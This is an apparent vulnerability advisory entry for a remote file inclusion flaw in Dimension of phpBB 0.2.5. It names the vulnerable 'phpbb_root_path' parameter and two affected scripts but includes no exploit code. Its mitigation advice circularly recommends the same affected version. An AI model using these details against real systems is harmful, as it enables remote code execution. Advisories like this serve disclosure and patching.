vendor:
Dimension of phpBB
by:
SpiderZ
9,3
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: Dimension of phpBB
Affected Version From: 0.2.5 (phpBB 2.0.21)
Affected Version To: 0.2.5 (phpBB 2.0.21)
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpbb_group:dimension_of_phpbb
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Dimension of phpBB Remote File Inclusion Vulnerability
A remote file inclusion vulnerability exists in Dimension of phpBB 0.2.5 (phpBB 2.0.21). An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input to the 'phpbb_root_path' parameter in the 'themen_portal_mitte.php' and 'logger_engine.php' scripts. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable system. Successful exploitation will result in arbitrary code execution on the vulnerable system.
Mitigation:
Upgrade to the latest version of Dimension of phpBB 0.2.5 (phpBB 2.0.21) or later.
